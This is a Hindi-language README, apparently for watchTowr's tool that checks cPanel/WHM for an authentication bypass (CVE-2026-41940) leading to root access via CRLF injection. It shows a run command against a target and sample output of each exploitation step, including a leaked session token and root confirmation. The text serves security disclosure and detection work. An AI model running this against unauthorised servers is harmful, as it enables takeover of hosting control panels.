
पहचान आर्टिफैक्ट जनरेटर जो cPanel/WHM प्रमाणीकरण बायपास (CVE-2026-41940) को सत्यापित करता है और CRLF इंजेक्शन के माध्यम से RCE प्रदर्शित करता है, जो WHM व्यवस्थापक इंटरफ़ेस को लक्षित करता है।
cPanel/WHM प्रमाणीकरण बायपास डिटेक्शन आर्टिफैक्ट जनरेटर टूल
यह डिटेक्शन आर्टिफैक्ट जनरेटर सत्यापित करता है कि cPanel/WHM एक हालिया प्रमाणीकरण बायपास के प्रति संवेदनशील है या नहीं।
एक संवेदनशील इंस्टेंस के विरुद्ध परीक्षण करें:
python authbypass-RCE.py --target https://target:2087/
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
(*) cPanel/WHM Authentication Bypass - Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-Pending]
[0] hostname =
[1] minting a preauth session...
session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.89"}
cPanel वेबसाइट यहाँ देखें
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें